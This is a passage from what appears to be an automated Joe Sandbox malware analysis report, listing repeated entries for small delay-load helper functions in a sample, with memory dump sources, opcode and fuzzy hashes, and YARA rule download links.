                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d2e270a8c0cb91a7b1a01e3df55f6272741b88d605407dce7af61adb0c6789f2
                  • Instruction ID: 2eb5edd242144d7374809e40447b936d4fb3101aecec811622515beed9781f9e
                  • Opcode Fuzzy Hash: d2e270a8c0cb91a7b1a01e3df55f6272741b88d605407dce7af61adb0c6789f2
                  • Instruction Fuzzy Hash: 1EB012A526C3017C314C71547D42D36031CC6D3B10331811BF10DE01C1D7405E461E31
                  Function 0018D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: aa9b7df056c63e819dea53fc94bc5d2e3c46985d0ff59645dfff5fb77166f093
                  • Instruction ID: f077acf2fd78601e12470f5dc9d2a5f81f1311f50b39f145e2bd16ef970c6fa5
                  • Opcode Fuzzy Hash: aa9b7df056c63e819dea53fc94bc5d2e3c46985d0ff59645dfff5fb77166f093
                  • Instruction Fuzzy Hash: 89B012B526D3017C314C72947D42D36031DC6D3B10331811BF109E01C1D7405D451E31
                  Function 0018D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6f0ee09cf1388ddac758699f6bbf0128d0ff7de63b23d097579e553c3a673477
                  • Instruction ID: 65c12eae26dd686d1603493721a79e6ae8230b9e63cd3b23dd2497718d818796
                  • Opcode Fuzzy Hash: 6f0ee09cf1388ddac758699f6bbf0128d0ff7de63b23d097579e553c3a673477
                  • Instruction Fuzzy Hash: C3B012A526D2017C310C71547D42D36031DC6D3B10330C01BF509E01C1D7405D051E31
                  Function 0018D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1c76304bbb7213ae1eac128105a2e7381eff99dd7c0ac8029f948722461dfb6f
                  • Instruction ID: b26ddfa3a11f7a3ef76d405b2e43b680ed48bbdcccc3b97a12d4537491de824b
                  • Opcode Fuzzy Hash: 1c76304bbb7213ae1eac128105a2e7381eff99dd7c0ac8029f948722461dfb6f
                  • Instruction Fuzzy Hash: 6CB012D526C2017C310C71647D83D36035CCAD3B10331C01BF609E01C1D7405D051E31
                  Function 0018D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: db7170fec43355b837ac1ecaeb61d0aa609024f2aa2ed008cfb4d7bf2711dc48
                  • Instruction ID: f2ef0f15ed2550c95c13fa1696f82132a6939219bf533aeab537d55defcc52ae
                  • Opcode Fuzzy Hash: db7170fec43355b837ac1ecaeb61d0aa609024f2aa2ed008cfb4d7bf2711dc48
                  • Instruction Fuzzy Hash: DBB012A527D2027C310C71547D42D36035DCAD3B10330801BF109E01C1D7405D051E31
                  Function 0018D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 25cd847d68b7d4272c58cb0470d2acf272d245f7fd4d610c9835d4b2e1c0063b
                  • Instruction ID: 5359632d6b06766c23cf7bfaf42524ab8a1675290accc5f082615396c47d9845
                  • Opcode Fuzzy Hash: 25cd847d68b7d4272c58cb0470d2acf272d245f7fd4d610c9835d4b2e1c0063b
                  • Instruction Fuzzy Hash: ADB012E526C2017C310C71547E83D36039CCAD3B10330801BF109E01C1D7405E061E31
                  Function 0018DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 04bf6e468d774bce241abd535b4b72b741641ceb502c9b94197b12463bdd44c1
                  • Instruction ID: d4902fee0c94281f27914df2c9ad3b24e327f24d489e15a4a158e183f8b3f704
                  • Opcode Fuzzy Hash: 04bf6e468d774bce241abd535b4b72b741641ceb502c9b94197b12463bdd44c1
                  • Instruction Fuzzy Hash: E5B012D526C2016C310C71467D02E3E035CC2D4B10330C51BF109D11C9D7405D0A5E32
                  Function 0018DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1b80dbaf32c20a2466cbc96e4caabc9d9aeb3f7124ccdba409b6f4eba5eb3ea2
                  • Instruction ID: 75543eb40fcb77ae7af02e3692f7afcff89fc3a4b67f320e268bd6a7f590d749
                  • Opcode Fuzzy Hash: 1b80dbaf32c20a2466cbc96e4caabc9d9aeb3f7124ccdba409b6f4eba5eb3ea2
                  • Instruction Fuzzy Hash: 97B012E526C201AC320C71467D02D3A035CC2D0B10330C11BF409D11C5D7444E065E32
                  Function 0018DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 4c12038b5d72c0f37a44e1cce5ea0017a3d4a5c615332c6e7a06cc51b35461cb
                  • Instruction ID: be279daf783841bbe3e615ec205b92a835256fae3315314a3a13bd1b927b75f9
                  • Opcode Fuzzy Hash: 4c12038b5d72c0f37a44e1cce5ea0017a3d4a5c615332c6e7a06cc51b35461cb
                  • Instruction Fuzzy Hash: C7B012D52AC3016D710C71467D42E3A035CD2D1B11330811BF009D11C5D7404D059F32
                  Function 0018DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 345f7a4fa1148f1ccdae71769ba0d5bfcf82cae60297c8ac9d26e9d34a789462
                  • Instruction ID: a3e19ea2d51e78423cdca248195e26f77475163e1c967fd55a1c88bf7a74a183
                  • Opcode Fuzzy Hash: 345f7a4fa1148f1ccdae71769ba0d5bfcf82cae60297c8ac9d26e9d34a789462
                  • Instruction Fuzzy Hash: 07B0129D36C2416C310C71143D07E36036CD2D1B10331802BF11BD01C2DB504D095A31
                  Function 0018DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 47f40e89f05442453e0acce3244dd4fb2ae8ee3ce59a68f67d47d5960490cc58
                  • Instruction ID: a228254301fc34d866418fbe26293e8fc98704c86969a9917448e6bbf3c18e87
                  • Opcode Fuzzy Hash: 47f40e89f05442453e0acce3244dd4fb2ae8ee3ce59a68f67d47d5960490cc58
                  • Instruction Fuzzy Hash: C3B0129937C3467C320C31003D07C37032CC2D1B10331412BF106E00C2DB944D495931
                  Function 0018DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 3a6f5b4a255a76d7791530e9d684bb1310ce82a01fbde8f55ae5f1c219c9a517
                  • Instruction ID: 50f3c7c96eaa7b5bfcc8e359008e363b94fbc47d9fcf3f9b9abef3130b0a009f
                  • Opcode Fuzzy Hash: 3a6f5b4a255a76d7791530e9d684bb1310ce82a01fbde8f55ae5f1c219c9a517
                  • Instruction Fuzzy Hash: E6B0129936C2826C310C71043E07D37036CC2D5B10331801BF20AD01C2DB954D065A31
                  Function 0018DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 37ef84409b763e690988fd60a435d0e481e16410053d61cacf6576f0cedf064f
                  • Instruction ID: 030400ce9e1943d0a0cc0709f869c312153b0da6be34caa56e917a6ae75dff80
                  • Opcode Fuzzy Hash: 37ef84409b763e690988fd60a435d0e481e16410053d61cacf6576f0cedf064f
                  • Instruction Fuzzy Hash: C6B0129936C242AC320C71043D07D37037CC2D1B10331801BF50AD11C2DB944D095A31
                  Function 0018DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DC36
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: dbf97af7052b45ede29045e6c80af427f721573429718d985bf9445da16b193f
                  • Instruction ID: 0e4ff0b2ee8605bd8dc2655317831319c899f3550d2d9318a211820ea14351ac
                  • Opcode Fuzzy Hash: dbf97af7052b45ede29045e6c80af427f721573429718d985bf9445da16b193f
                  • Instruction Fuzzy Hash: 44B0929926C301AC210C31007A12836032CC2D0B11321861AF209A0081A7805D456931
                  Function 0018DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DC36
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 534f582cbde6eece33af95db6c9dd562f1a0c8c8b06275dacf9b1f6173124665
                  • Instruction ID: d51ddbdcf1d0a149a85751c113b65d83c3002b1f9d79cc14f0f8876e93ca2789
                  • Opcode Fuzzy Hash: 534f582cbde6eece33af95db6c9dd562f1a0c8c8b06275dacf9b1f6173124665
                  • Instruction Fuzzy Hash: ABB0129927C302AC310C71047D12D36037CC2D0B10330851FF20DE11C1E7805D055A31
                  Function 0018DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DC36
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 4f9f238f783a2492046bca4ee2c466dc97fa9344f561218656dab3f4faac70d8
                  • Instruction ID: df8abe6d2b0180988d53e86bf6d1aafcc412aa3bbf272b600cedaaf51887ff13
                  • Opcode Fuzzy Hash: 4f9f238f783a2492046bca4ee2c466dc97fa9344f561218656dab3f4faac70d8
                  • Instruction Fuzzy Hash: A0B0129926C301BC310C71047D12D36037CC2D5B10330C51FF60DE11C1E7805D055A31
                  Function 0018D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
